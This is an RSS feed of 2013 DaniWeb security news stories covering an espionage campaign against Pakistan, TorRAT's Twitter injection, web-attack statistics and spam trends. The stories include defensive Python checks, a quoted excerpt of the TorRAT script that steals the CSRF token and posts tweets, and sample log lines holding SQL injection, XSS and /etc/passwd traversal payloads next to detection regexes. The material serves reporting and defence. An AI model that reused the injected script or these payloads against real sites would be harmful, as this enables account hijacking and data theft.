<?xml version="1.0" encoding="utf-8" ?><?xml-stylesheet type="text/xsl" href="http://www.daniweb.com/js/rss.xsl"?><rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/">
	<channel>
		<title>DaniWeb IT Discussion Community - Viruses, Spyware and other Nasties News Stories</title>
		<link>http://www.daniweb.com/hardware-and-software/microsoft-windows/viruses-spyware-and-other-nasties/news/_/64</link>
		<description>Our Viruses, Spyware and other Nasties forum is the place for Q&amp;A-style discussions related to Windows security. Post a HijackThis log here if you think you've got viruses, spyware, adware, malware, or other unwanted guests.</description>
		<language>en-US</language>
		<ttl>60</ttl>
		<!-- PubSubHubbub Discovery -->
		<link rel="hub" href="http://daniweb.superfeedr.com/" xmlns="http://www.w3.org/2005/Atom" />
		<link rel="self" href="http://www.daniweb.com/rss/pull/64/news" xmlns="http://www.w3.org/2005/Atom" />
		<!-- End Of PubSubHubbub Discovery -->
				<item>
			<title>Indian hackers take aim at Pakistan data during two year attack</title>
			<link>http://www.daniweb.com/hardware-and-software/microsoft-windows/viruses-spyware-and-other-nasties/news/454905/indian-hackers-take-aim-at-pakistan-data-during-two-year-attack</link>
			<pubDate>Sun, 19 May 2013 09:13:22 +0000</pubDate>
			<description>Security researchers at ESET [have revealed](http://www.welivesecurity.com/2013/05/16/targeted-threat-pakistan-india/) that a prolonged and highly targeted data stealing attack aimed at Pakistan, using fake PDF documents, appears to have originated in India. Using a code signing certificate (issued to what looks like a legitimate company 'Technical and Commercial Consulting Pvt. Ltd') to sign malicious ...</description>
			<content:encoded><![CDATA[ <p>Security researchers at ESET <a href="http://www.welivesecurity.com/2013/05/16/targeted-threat-pakistan-india/" rel="nofollow">have revealed</a> that a prolonged and highly targeted data stealing attack aimed at Pakistan, using fake PDF documents, appears to have originated in India.</p>

<p>By signing the malicious binaries with a code signing certificate issued to what looks like a legitimate company, 'Technical and Commercial Consulting Pvt. Ltd', the attackers greatly improved their chances of getting the payload onto victims' machines, since a valid signature makes a file look trustworthy to both users and security software. The company concerned, ESET says, was based in New Delhi and the certificate itself was issued in 2011. The signed executables were disguised as documents, mainly PDFs, attached to emails, with the signature adding authenticity to the lure.</p>

<p>ESET malware researcher Jean-Ian Boutin reveals that during the investigation there were several leads that indicated the threat originates from India. "First, the code signing certificate was issued to an Indian company. In addition, all the signing timestamps are between 5:06 and 13:45 UTC, which is consistent with 8-hour work shifts falling between 10:36 and 19:15 in Indian Standard Time" he says, continuing, "we have identified several different documents that followed different themes likely to be enticing to the recipients. One of these is the Indian armed forces". Indian Standard Time is UTC+5:30, which is how a 5:06 to 13:45 UTC range maps onto a 10:36 to 19:15 local working day. Boutin admits, however, that there is no precise information at this point as to which individuals or organisations were specifically targeted by the files. "Based on our investigations" he continues "it is our assumption that people and institutions in Pakistan were targeted".</p>
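<p>As an added example, not ESET's own tooling, the following Python script shows the working-hours check Boutin describes: take a set of signing timestamps in UTC, shift them into candidate time zones, and see which zone turns them into a plausible working day. The timestamps, the candidate zones, the office-hours thresholds and the function names are constructed assumptions of this example. The caveat a practitioner should keep in mind is that signing timestamps can be forged and a single indicator proves little, which is why ESET stacks it with the certificate issuer, the lure themes and the telemetry.</p>

```python
from datetime import datetime, timedelta

# Constructed sample of code-signing timestamps in UTC. The values are spread
# over the range ESET reported (05:06 to 13:45 UTC) but are not ESET's data.
SAMPLE_SIGNING_TIMES_UTC = [
    "2012-01-09 05:06:00",
    "2012-02-14 07:42:00",
    "2012-03-20 09:15:00",
    "2012-05-03 11:58:00",
    "2012-06-27 12:30:00",
    "2012-08-15 13:45:00",
    "2012-10-02 06:20:00",
    "2012-12-11 10:05:00",
]

# Candidate zones as fixed offsets. India does not observe DST, so a fixed
# offset is exact for IST; the others are comparison points only.
CANDIDATE_ZONES = {
    "UTC": timedelta(0),
    "IST (UTC+5:30)": timedelta(hours=5, minutes=30),
    "CST (UTC+8)": timedelta(hours=8),
    "EST (UTC-5)": timedelta(hours=-5),
}


def parse_utc(stamp):
    """Parse 'YYYY-MM-DD HH:MM:SS' as a naive UTC datetime."""
    return datetime.strptime(stamp, "%Y-%m-%d %H:%M:%S")


def minutes_of_day(dt):
    return dt.hour * 60 + dt.minute


def local_window(stamps_utc, offset):
    """Earliest and latest local time of day, in minutes after midnight."""
    local = [minutes_of_day(parse_utc(s) + offset) for s in stamps_utc]
    return min(local), max(local)


def fits_workday(window, start=8 * 60, end=20 * 60, max_span=10 * 60):
    """True when every signing falls inside office hours and the spread is no
    wider than one long working day. The thresholds are assumptions."""
    first, last = window
    return start <= first and last <= end and (last - first) <= max_span


def plausible_zones(stamps_utc, zones=CANDIDATE_ZONES):
    """Names of the zones whose local-time window looks like a working day."""
    return [name for name, off in zones.items()
            if fits_workday(local_window(stamps_utc, off))]


def fmt(minutes):
    return "%02d:%02d" % divmod(minutes, 60)


if __name__ == "__main__":
    for name, offset in CANDIDATE_ZONES.items():
        first, last = local_window(SAMPLE_SIGNING_TIMES_UTC, offset)
        verdict = "plausible working day" if fits_workday((first, last)) else ""
        print("%-16s %s - %s  %s" % (name, fmt(first), fmt(last), verdict))
```

<p>With the sample above only the IST column lands inside an 8am to 8pm window; UTC starts too early, UTC+8 runs past 9pm and UTC-5 puts the work at midnight. Run against real Authenticode timestamps the same test is only as good as the assumption that the signer worked normal hours and did not tamper with the clock.</p>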

<p>One of the fake PDF files was delivered through a self-extracting archive called “pakistandefencetoindiantopmiltrysecreat.exe”, and ESET telemetry data shows that Pakistan is heavily affected by this campaign, with 79% of detections being in that country. The first infection vector exploited a widely used and abused vulnerability, CVE-2012-0158, a flaw in the MSCOMCTL ActiveX control that can be triggered by a specially crafted Microsoft Office document and allows arbitrary code execution. The documents were delivered by email, and the malicious code ran as soon as the document was opened, without the user noticing anything. The other infection vector was Windows executable files made to look like Word or PDF documents, again distributed via email. In both cases, to avoid arousing the victim's suspicion, a decoy document is displayed on execution.</p>
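<p>An added example, not part of ESET's report, of the check a mail gateway or an analyst can apply to attachments of the kind described above: compare the format claimed by the file name with the format implied by the leading bytes, and flag document names that turn out to be PE images or that hide an executable behind a double extension. The sample names, byte strings and function names are constructed for illustration.</p>

```python
# File signatures for the formats the lure files pretend to be, plus the
# PE header that every Windows executable (including a self-extracting
# archive) actually starts with.
MAGIC = {
    "pdf": b"%PDF-",
    "doc": b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1",  # OLE2 compound file (legacy .doc)
    "docx": b"PK\x03\x04",                       # OOXML is a ZIP container
    "exe": b"MZ",
}
DOCUMENT_EXTS = {"pdf", "doc", "docx"}
EXECUTABLE_EXTS = {"exe", "scr", "com", "pif"}


def sniff(data):
    """Return the format implied by the leading bytes, or None if unknown."""
    for fmt, sig in MAGIC.items():
        if data.startswith(sig):
            return fmt
    return None


def extensions(filename):
    """All dotted suffixes, lower-cased: 'report.pdf.exe' -> ['pdf', 'exe']."""
    return filename.lower().split(".")[1:]


def assess(filename, data):
    """Return the reasons an attachment looks like an executable dressed up as
    a document; an empty list means name and content agree."""
    reasons = []
    exts = extensions(filename)
    final = exts[-1] if exts else ""
    content = sniff(data)

    if final in DOCUMENT_EXTS:
        if content == "exe":
            reasons.append("PE header but .%s extension" % final)
        elif content != final:
            reasons.append("extension .%s does not match content %s" % (final, content))
    # 'report.pdf.exe': a document-looking name with an executable suffix,
    # which Windows hides by default when known extensions are suppressed.
    if final in EXECUTABLE_EXTS and DOCUMENT_EXTS.intersection(exts[:-1]):
        reasons.append("double extension hides executable: %s" % filename)
    return reasons


# Constructed samples, not real malware: a genuine PDF, a PE image carrying a
# .pdf name, and a self-extracting executable with a document-style name.
SAMPLES = {
    "budget.pdf": b"%PDF-1.4\n%\xe2\xe3\xcf\xd3\n",
    "briefing.pdf": b"MZ\x90\x00\x03\x00\x00\x00" + b"\x00" * 56,
    "defence_secret.pdf.exe": b"MZ\x90\x00" + b"\x00" * 60,
}


def scan_samples(samples=SAMPLES):
    """Map each sample name to its list of findings."""
    return {name: assess(name, data) for name, data in samples.items()}


if __name__ == "__main__":
    for name, reasons in scan_samples().items():
        print("%-26s %s" % (name, "; ".join(reasons) or "ok"))
```

<p>A signature check like this catches the second vector (an executable pretending to be a document) but not the first: a CVE-2012-0158 lure is a genuine Office file and passes the magic-byte test, so that path still needs patching and exploit mitigation rather than filename hygiene.</p>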

<p>"The malware was stealing sensitive data from infected PCs and sending them to the attackers’ servers" Boutin adds "It was using various types of data-stealing techniques, among them a key-logger, taking screenshots and uploading documents to attackers’ computer. Interestingly, the information stolen from an infected computer was uploaded to the attacker’s server unencrypted." Unencrypted exfiltration is a gift to defenders: the stolen documents and keystrokes are visible in plain text to any network monitoring on the egress path.</p>

<p><img src="/attachments/fetch/L2ltYWdlcy9hdHRhY2htZW50cy8wLzk2NTVmNjJmNDhhMjUzNWY5ZjJiNDI4MzZjMTBlODU2LmpwZw%3D%3D/493" alt="9655f62f48a2535f9f2b42836c10e856" title="9655f62f48a2535f9f2b42836c10e856" /></p>

<p>As you can see from the above screenshot, several strings in the binaries analysed by ESET are related to Indian culture, in particular a variable called ramukaka was used. Boutin explains that "Ramu Kaka is a typical Bollywood-style servant in a house. Considering that this variable is responsible for achieving persistence on the system, this definition is a good fit".</p>

<p>However, the most compelling argument to suggest that the attacks originate in India is to be found within the ESET research telemetry data. According to Boutin, many malware variants tied to the attack appeared in the same location during a small time-frame. Each of these was very similar to the others, which strongly suggests an attempt to evade malware detection. "These files all appeared in the same region of India" Boutin concludes...</p>
 ]]></content:encoded>
			<category domain="http://www.daniweb.com/hardware-and-software/microsoft-windows/viruses-spyware-and-other-nasties/64">Viruses, Spyware and other Nasties</category>
			<dc:creator>happygeek</dc:creator>
			<guid isPermaLink="true">http://www.daniweb.com/hardware-and-software/microsoft-windows/viruses-spyware-and-other-nasties/news/454905/indian-hackers-take-aim-at-pakistan-data-during-two-year-attack</guid>
		</item>
				<item>
			<title>Javascript Twitter injection launches Man-in-the-Browser attacks</title>
			<link>http://www.daniweb.com/hardware-and-software/microsoft-windows/viruses-spyware-and-other-nasties/news/453999/javascript-twitter-injection-launches-man-in-the-browser-attacks</link>
			<pubDate>Mon, 06 May 2013 09:50:53 +0000</pubDate>
			<description>Dana Tamir, Enterprise Security Director for [Trusteer](http://www.trusteer.com/) has recently uncovered a variation of the TorRAT banking data malware which has been actively configured to target Twitter users. The attack works by &quot;injecting Javascript code into the victim’s Twitter account page&quot; Tamir says, adding that the malware &quot;collects the user’s authentication ...</description>
			<content:encoded><![CDATA[ <p>Dana Tamir, Enterprise Security Director for <a href="http://www.trusteer.com/" rel="nofollow">Trusteer</a>, has recently uncovered a variation of the TorRAT banking malware which has been configured to target Twitter users. The attack works by "injecting Javascript code into the victim’s Twitter account page" Tamir says, adding that the malware "collects the user’s authentication token, which enables it to make authorized calls to Twitter's APIs, and then posts new, malicious tweets on behalf of the victim". That token is the anti-CSRF value Twitter embeds in the page; because the injected script runs inside the victim's already authenticated browser session it can read the token straight from the DOM, and the resulting API call is indistinguishable, server side, from one the user made. These tweets are used, of course, to spread the malware within the social networking circle by leveraging the trust that is implicit in such networks. Twitter users, generally speaking, follow people and accounts that they trust. When these accounts are compromised by such an attack it becomes quite easy to persuade followers to click through to drive-by malware pages, simply courtesy of the level of implied trust invested in the original poster.</p>

<p>At the moment this particular attack seems to be confined to the Dutch market, with tweets saying such things as "Onze nieuwe koning Willem gaat nog meer verdienen dan beatrix. check zijn salaris" which roughly translates to "Our new King Willem is going to earn even more than Beatrix. Check his salary" and contains a malicious link.<br />
Of course, the attack vector will most likely soon change as other groups adopt the methodology and adapt the code accordingly.</p>

<p>Dana Tamir provided an excerpt from that injected Javascript code to highlight what is being done:</p>

<pre><code>// Runs inside the victim's authenticated Twitter session, so it can read the
// page's anti-CSRF token and post through the same endpoint the site uses.
function _PostTweet() {
        // authenticity_token is the CSRF token Twitter embeds in the page;
        // lifting it from the DOM satisfies the server-side token check.
        var a = $('input[name="authenticity_token"]').val();
        // Only post if a token was found. _GetRndMsg() supplies one of the
        // attacker's lure messages (defined elsewhere in the injected script).
        a.length &gt; 0 &amp;&amp; $.post("/i/tweet/create", {
            authenticity_token: a,
            place_id: "",
            status: _GetRndMsg()
        }).always(function () {
            // Mark the tweet as sent in the script's own state (ar[] and
            // SetO() are not shown in the excerpt) and reload the page.
            ar[0].msgsent = 1, SetO(), window.location.href = window.location.href
        })
    }
</code></pre>

<p>Trusteer advises that enterprise exploit prevention technology, which stops vulnerable endpoint applications (browser clients) from being exploited and malware from being downloaded and executed, is the best way to stop such attacks dead. "External sources like web content and email attachments, which can include a hidden exploit in the form of embedded code, should never be trusted" Trusteer says "Such content should only be opened while monitoring the application state to ensure it is operating legitimately".</p>
 ]]></content:encoded>
			<category domain="http://www.daniweb.com/hardware-and-software/microsoft-windows/viruses-spyware-and-other-nasties/64">Viruses, Spyware and other Nasties</category>
			<dc:creator>happygeek</dc:creator>
			<guid isPermaLink="true">http://www.daniweb.com/hardware-and-software/microsoft-windows/viruses-spyware-and-other-nasties/news/453999/javascript-twitter-injection-launches-man-in-the-browser-attacks</guid>
		</item>
				<item>
			<title>Cyber-attack &#039;superfecta&#039; statistics released</title>
			<link>http://www.daniweb.com/hardware-and-software/microsoft-windows/viruses-spyware-and-other-nasties/news/453172/cyber-attack-superfecta-statistics-released</link>
			<pubDate>Wed, 24 Apr 2013 06:45:03 +0000</pubDate>
			<description>You may be wondering what a superfecta actually is, and the answer is: the most dangerous and serious threat to business. To clarify, the superfecta as defined by secure cloud hosting outfit FireHost is a group of four attack vectors that comprises of Cross-Site Request Forgery (CSRF), Cross-Site Scripting (XSS), ...</description>
			<content:encoded><![CDATA[ <p>You may be wondering what a superfecta actually is, and the answer is: the most dangerous and serious threat to business. To clarify, the superfecta as defined by secure cloud hosting outfit FireHost is a group of four attack vectors comprising Cross-Site Request Forgery (CSRF), Cross-Site Scripting (XSS), SQL Injection and Directory Traversal.</p>

<p>Cross-Site Request Forgery (CSRF) is an attack mode that forces the end user to execute an unwanted action on a web application in which they are currently authenticated, typically by getting their browser to send a request they never intended while it still carries their session cookie. Cross-Site Scripting (XSS) involves the insertion of malicious script into webpages so that it runs in the browsers of other visitors to the site. SQL Injection, as everyone surely knows by now, involves feeding input through URLs and text fields of a vulnerable site so that it is executed as part of a database query, usually in an attempt to steal the contents of databases storing valuable data such as credit card details or usernames and passwords. And finally, Directory Traversal (also known as a Path Traversal attack) uses sequences such as ../ in a file name parameter to reach files and directories stored outside the web root folder.</p>
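<p>As an added illustration, not from FireHost or the original article, here is a small Python classifier that labels three of the four superfecta patterns in constructed Apache-style access-log lines; the log lines, regexes and function names are assumptions of this example. The fourth, CSRF, is deliberately absent from the signature list: a forged request carries no malicious payload and is indistinguishable in a log from a genuine one, which is why it has to be stopped by a per-session token or Origin check in the application rather than by pattern matching at a firewall.</p>

```python
import re
from urllib.parse import unquote

# Constructed Apache-style access log lines (not FireHost's data). The first
# request is benign; the next three carry the three payload-bearing superfecta
# patterns; the last is a state-changing POST that a CSRF attack would forge.
SAMPLE_LOG = """\
203.0.113.7 - - [12/Mar/2013:10:01:12 +0000] "GET /products?id=42 HTTP/1.1" 200 512
203.0.113.7 - - [12/Mar/2013:10:01:20 +0000] "GET /products?id=42%27%20OR%20%271%27%3D%271 HTTP/1.1" 200 8192
198.51.100.2 - - [12/Mar/2013:10:02:05 +0000] "GET /search?q=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 1024
198.51.100.2 - - [12/Mar/2013:10:02:40 +0000] "GET /static/../../../../etc/passwd HTTP/1.1" 404 231
192.0.2.9 - - [12/Mar/2013:10:03:01 +0000] "POST /account/transfer HTTP/1.1" 302 0
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Deliberately small signature set: enough to label the sample lines, and a
# reminder that real WAF rule sets are far longer and still produce false hits.
SIGNATURES = {
    "sqli": re.compile(r"""['"]\s*(or|and)\s+['"\d]|union\s+select|;\s*drop\s""", re.I),
    "xss": re.compile(r"<\s*script|javascript:|\bon\w+\s*=", re.I),
    "traversal": re.compile(r"(^|/)\.\.(/|$)"),
}


def classify(target):
    """Labels for a request target. Decoded twice so %2527-style double
    encoding does not slip past the patterns."""
    decoded = unquote(unquote(target))
    return [name for name, rx in SIGNATURES.items() if rx.search(decoded)]


def scan(log_text):
    """Return (ip, target, labels) for every request that matched a signature."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        labels = classify(m.group("target"))
        if labels:
            hits.append((m.group("ip"), m.group("target"), labels))
    return hits


if __name__ == "__main__":
    for ip, target, labels in scan(SAMPLE_LOG):
        print(ip, ",".join(labels), target)
```

<p>The POST to /account/transfer never shows up in the output, and that is the point: whether it was the user or a hidden form on an attacker's page that submitted it cannot be told from the request line, so counting CSRF "attacks" at a firewall, as FireHost's figures do, necessarily rests on heuristics such as missing or mismatched Referer and Origin headers.</p>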

<p>At the InfoSecurity Europe show yesterday, FireHost revealed its web application attack statistics for the first quarter of 2013, detailing the superfecta attacks blocked by the firewalls protecting its servers in both Europe and the United States between January and March.</p>

<p><img src="/attachments/fetch/L2ltYWdlcy9hdHRhY2htZW50cy8wLzEyNTI2OTdkOGQxNDMzZmEyMWU2MGQ2NGZlOGU0NmRlLmpwZw%3D%3D/500" alt="1252697d8d1433fa21e60d64fe8e46de" title="1252697d8d1433fa21e60d64fe8e46de" /> The volume of Cross-Site Request Forgery (CSRF) attacks was up by an astonishing 132% by the end of the quarter, compared to the same period during 2012. The second most significant increase in frequency was seen in SQL injection, which rose by 87%. Overall, however, Cross-Site Scripting (XSS) was the most prevalent superfecta attack type during the period monitored, with more than 1,200,000 attacks being blocked in total.</p>

<p>"The Superfecta represents the most dangerous type of cyberattack traffic, but these are by no means advanced or difficult attacks for cybercriminals to launch" says Chris Hinkley, Senior Security Engineer at FireHost who continues "for example, cross-site request forgery attacks and cross site scripting attacks are extremely automated and require very little knowledge to implement. It only makes sense that CSRF attacks would increase due to more automated attacks in the arsenals of cybercriminals. SQL Injection attacks represent a smaller portion of the attack traffic we block for our customers, as these attacks require more expertise, but when they're successful, they are very effective. Many will remember or have even been affected by successful SQL Injection attacks on a number of global brands over the past few years. What these numbers really say is malicious web traffic is very diverse and businesses should ensure that they are doing as much as possible to mitigate it."</p>
 ]]></content:encoded>
			<category domain="http://www.daniweb.com/hardware-and-software/microsoft-windows/viruses-spyware-and-other-nasties/64">Viruses, Spyware and other Nasties</category>
			<dc:creator>happygeek</dc:creator>
			<guid isPermaLink="true">http://www.daniweb.com/hardware-and-software/microsoft-windows/viruses-spyware-and-other-nasties/news/453172/cyber-attack-superfecta-statistics-released</guid>
		</item>
				<item>
			<title>Spamhaus DDoS attack not to blame for rise in spam</title>
			<link>http://www.daniweb.com/hardware-and-software/microsoft-windows/viruses-spyware-and-other-nasties/news/451322/spamhaus-ddos-attack-not-to-blame-for-rise-in-spam</link>
			<pubDate>Sun, 31 Mar 2013 11:20:37 +0000</pubDate>
			<description>The media, online and off, has been full of scare stories about the 'biggest Internet attack ever' and how a distributed denial of service (DDoS) campaign aimed against anti-spam outfit Spamhaus peaked at an attack volume of 300 Gbps (the highest ever recorded by those who record such things) was ...</description>
			<content:encoded><![CDATA[ <p>The media, online and off, has been full of scare stories about the 'biggest Internet attack ever' and how a distributed denial of service (DDoS) campaign aimed against anti-spam outfit Spamhaus, which peaked at an attack volume of 300 Gbps (the highest ever recorded by those who record such things), was 'slowing down the global Internet'. DaniWeb didn't join the rush to shout 'the sky is falling' as, frankly, we didn't believe it: there was precious little evidence to be found that the DDoS attack was impacting anyone other than Spamhaus, its anti-DDoS protection service CloudFlare and their upstream providers. Sure, it was a serious attack, one that could well have implications for the direction such things are heading in, and potentially could be bad news for all of us.</p>

<p>However, the Internet did not slow down and for the vast majority of global users there was no noticeable effect at all. The one area that you might think would be impacted is the amount of spam that reaches your mailbox. After all, if one of the main organisations responsible for keeping the lid on spam distribution channels is taken off air then surely we can expect to see spam levels peak. So when a press release arrived following these attacks which proclaimed that spam is twice as likely to be hitting mailboxes than previously, I was concerned. But only for a few moments, as a bit more reading reassured me that it had nothing to do with the Spamhaus attacks at all.</p>

<p><img src="/attachments/fetch/L2ltYWdlcy9hdHRhY2htZW50cy8wLzAwMTIxNTM5M2RkNzUxYThkYzlkYTkxZDVkZDBmMjAzLmpwZw%3D%3D/473" alt="001215393dd751a8dc9da91d5dd0f203" title="001215393dd751a8dc9da91d5dd0f203" /></p>

<p>Hear the name 'Virus Bulletin' and you immediately think of anti-virus and anti-malware certification and testing, but the same organization also carries out comprehensive spam filtering reviews. In the latest of these anti-spam comparative reviews, some 17 of the products and services put to the test passed with colours that flew enough to get the coveted 'VBSpam award', but there's a catch: the majority of them did so while catching less spam than they used to. In fact, a lot less spam. Of the 19 anti-spam solutions tested, only a rather worrying three managed to improve their spam catch rates, with nine seeing the percentage of spam they missed at least double compared with recent test results. Indeed, as a result of the overall test figures, Virus Bulletin now reckons that a spam message is almost twice as likely to make it into your inbox on average when compared to the previous batch of tests.</p>

<p>If that wasn't bad enough, it appears that the majority of the products tested also had quite a bit more difficulty in preventing false positives. Only four of them correctly identified all the legitimate email in the test runs. When it came to one of the biggest scourges in the average email inbox, phishing scams, more than half of the filters missed "at least 10%" of the messages in a dedicated feed of pure phishing mail.</p>

<p>This downward trend has been spotted before as a result of the VB testing: a very similar statistical drop popped up early in 2012 and continued throughout the first half of the year before the filters caught up with the con men and halted the decline. "Spam has been a relatively good news story in recent years, with spam levels declining while catch rates remained high," VB's Anti-Spam Test Director Martijn Grooten says, though he adds that "in spam filtering, the devil is in the details, and when we look at these details, we see more emails slipping through the maze."</p>

<p>Considering that much of the spam that gets delivered will come complete with malware attachments or links to a compromised web site, the fact that spam catch rates are falling is of concern. Not least because it suggests that the bad guys are keeping ahead of the good guys in terms of tweaking the delivery process in order to avoid the filtering traps. While the anti-spam industry does appear to have a record of catching up with these tricks and tweaks, the fact that it takes half a year to do so really isn't good enough.</p>
 ]]></content:encoded>
			<category domain="http://www.daniweb.com/hardware-and-software/microsoft-windows/viruses-spyware-and-other-nasties/64">Viruses, Spyware and other Nasties</category>
			<dc:creator>happygeek</dc:creator>
			<guid isPermaLink="true">http://www.daniweb.com/hardware-and-software/microsoft-windows/viruses-spyware-and-other-nasties/news/451322/spamhaus-ddos-attack-not-to-blame-for-rise-in-spam</guid>
		</item>
				<item>
			<title>Did the US military just hack North Korea?</title>
			<link>http://www.daniweb.com/hardware-and-software/microsoft-windows/viruses-spyware-and-other-nasties/news/450329/did-the-us-military-just-hack-north-korea</link>
			<pubDate>Mon, 18 Mar 2013 08:31:05 +0000</pubDate>
			<description>It has been just over a month now since North Korea gloated about its successful nuclear weapon test. A test which prompted the imposition of new UN sanctions against Pyongyang, and if the Korean Central News Agency (KCNA) which acts as a state mouthpiece for the Democratic People's Republic of ...</description>
			<content:encoded><![CDATA[ <p>It has been just over a month now since North Korea gloated about its successful nuclear weapon test, a test which prompted the imposition of new UN sanctions against Pyongyang and, if the Korean Central News Agency (KCNA), which acts as a state mouthpiece for the Democratic People's Republic of Korea, is to be believed, has also prompted "intensive and persistent" cyber-attacks. Attacks which, according to the North Koreans, have been jointly launched by South Korea and the United States.</p>

<p><img src="/attachments/fetch/L2ltYWdlcy9hdHRhY2htZW50cy8wLzI4ZjJhODgwNTRlYWQwZGE1MjFjNjdjNjk2NGM0M2ExLmpwZw%3D%3D/300" alt="28f2a88054ead0da521c67c6964c43a1" title="align-right" /> The KCNA claims that the attacks, which are believed to have taken down official state websites such as KCNA itself, were timed to coincide with the military drills by the US and South Korea. Calling the attack cowardly and despicable, KCNA went on to insist that the "US and South Korean puppet regime are massively bolstering up cyber forces in a bid to intensify the subversive activities and sabotages against the DPRK". The KCNA statement went on to claim that "intensive and persistent virus attacks are being made every day on Internet servers operated by the DPRK".</p>

<p>It's not only the KCNA which is reporting that cyber attacks have been launched against the North Korean state. In Russia, the ITAR-TASS news agency has also claimed that some official North Korean websites were disabled after servers were brought down during a "powerful hacker attack".</p>

<p>Of course, it is perhaps a little hypocritical that North Korea should be complaining about being the victim of state sponsored cyber attack when it has long been thought to be engaging in exactly the same thing itself. Defectors to the South have insisted that North Korea has recruited thousands of hackers into a 'cyber warfare unit' similar to the Third Department of the Chinese People's Liberation Army (PLA), which is thought to have a specialist hacker section known as the 'Comment Crew'. And back in 2011 The Economist magazine reported how North Korea had hired out 30 elite programmers to a criminal group working out of China in order to steal millions of dollars from South Korean online gaming companies. This kind of state sponsored corporate crime is different to the normal cyber-warfare disruption tactic, and is designed purely to make money.</p>

<p>According to <a href="http://www.economist.com/blogs/banyan/2011/08/north-korean-computer-hackers" rel="nofollow">The Economist</a> the hackers netted some $6m, and this "is understood to have gone ultimately to the so-called Office 39, a department of the North Korean government responsible for earning foreign currency through illicit means, including drug trafficking" in order to get around the international sanctions which have made it so hard for North Korea to earn foreign currency. Not that the North Koreans are ignoring traditional cyber-warfare tactics, with that same report recounting how South Korean government websites have been crippled by DDoS attacks.</p>

<p>Jarno Limnell, a doctor in military science and also director of cyber-security for Stonesoft, warns "It’s an increasingly tense situation, and from a regional security point of view it’s important for America to be seen to be flexing its muscles. In cyber warfare, offense is typically a step or two ahead of defence. There is no such thing as a cast iron defence strategy when new threats and exploits emerge continually. As such, it is essential that sometimes the U.S. candidly communicates the power of its offensive capabilities as a deterrent. Akin to the scenario of mutually assured destruction at the hands of nuclear weapons during the cold war, the threat of vastly destructive retaliatory cyber capabilities is a powerful deterrent for prospective enemies and rogue states."</p>
 ]]></content:encoded>
			<category domain="http://www.daniweb.com/hardware-and-software/microsoft-windows/viruses-spyware-and-other-nasties/64">Viruses, Spyware and other Nasties</category>
			<dc:creator>happygeek</dc:creator>
			<guid isPermaLink="true">http://www.daniweb.com/hardware-and-software/microsoft-windows/viruses-spyware-and-other-nasties/news/450329/did-the-us-military-just-hack-north-korea</guid>
		</item>
				<item>
			<title>Are the Chinese really out to get paranoid IT security pros?</title>
			<link>http://www.daniweb.com/hardware-and-software/microsoft-windows/viruses-spyware-and-other-nasties/news/449945/are-the-chinese-really-out-to-get-paranoid-it-security-pros</link>
			<pubDate>Wed, 13 Mar 2013 10:50:12 +0000</pubDate>
			<description>A recent survey, conducted by IT risk management specialists nCircle, suggests that as many as 50% of IT security professionals think that the organisations they work for are a potential target for state-sponsored hackers. A number that Tim Keanini, nCircle Chief Research officer, thinks is rather on the low side ...</description>
			<content:encoded><![CDATA[ <p>A recent survey, conducted by IT risk management specialists nCircle, suggests that as many as 50% of IT security professionals think that the organisations they work for are a potential target for state-sponsored hackers. A number that Tim Keanini, nCircle Chief Research officer, thinks is rather on the low side in reality.</p>

<p>"The number of organizations that are potential targets for state-sponsored cyber attacks is probably much higher than 50%, because if attackers can’t break into a targeted organization, they will go after partners and suppliers" Keanini insists, adding "Frankly, I’m surprised that the level of paranoia among information security professionals isn’t higher."</p>

<p>Of course, to paraphrase a well known saying, just because you are a paranoid IT security professional doesn't mean that China isn't out to get you. Or, perhaps more accurately, just because the media says that China is the country most likely to be hacking your business doesn't mean that everyone else isn't also at it. The public perception of who is behind state-sponsored attacks is not only shaped by media reporting, but also mis-shaped if you ask me. Ask Keanini and he will say the same: "The reality is that nations that are really good at cyber attacks don’t make the news because they don’t get caught." Interestingly, when it comes to those IT security pros who were surveyed (more than 200 of them who attended the 2013 RSA Conference in San Francisco) some 48% go with China as being the best equipped for launching state-sponsored cyber attacks but 33% point the finger in the direction of the United States itself when it comes to advanced technical capability for such activity.</p>

<p>I'm not sure it really matters which direction state-sponsored hacking comes from, or where it is perceived to come from, or indeed if it is state-sponsored at all. Just look at the Worldwide Infrastructure Security Report from Arbor and you will see that quite clearly DDoS attacks are on the up: 76% of respondents experienced DDoS attacks towards their customers during the past year. Add to that the rise of hacktivism, with 33% reporting political and ideological disputes as the motivation behind those attacks, and it becomes clear that IT security professionals and the organisations they work for need to be focusing more on defense in depth and worrying less about apportioning blame.</p>

<p>As Dan Holden, Director of Arbor’s Security Engineering &amp; Response Team, points out: "Global recognition for effective cyber security solutions in business is rising, but many still continue to bury their heads in the sand. The truth is that any business operating online - from the largest enterprise to an individual operator - can become a target for attack, because of who they are, what they sell or who they partner with. It’s extremely important that organisations of all size take best practice defensive steps to ensure they are adequately protected if, or more likely when, they become the target of an attack."</p>
 ]]></content:encoded>
			<category domain="http://www.daniweb.com/hardware-and-software/microsoft-windows/viruses-spyware-and-other-nasties/64">Viruses, Spyware and other Nasties</category>
			<dc:creator>happygeek</dc:creator>
			<guid isPermaLink="true">http://www.daniweb.com/hardware-and-software/microsoft-windows/viruses-spyware-and-other-nasties/news/449945/are-the-chinese-really-out-to-get-paranoid-it-security-pros</guid>
		</item>
				<item>
			<title>Evernote hack turns into security advice farce</title>
			<link>http://www.daniweb.com/hardware-and-software/microsoft-windows/viruses-spyware-and-other-nasties/news/449120/evernote-hack-turns-into-security-advice-farce</link>
			<pubDate>Sun, 03 Mar 2013 09:08:12 +0000</pubDate>
			<description>Apple, Facebook and Twitter have all been the target of hackers recently, and now Evernote has admitted to a potential breach that has forced it to reset the passwords of approximately 50 million registered users. Evernote, a kind of web scrapbook that enables you to take notes, save web pages ...</description>
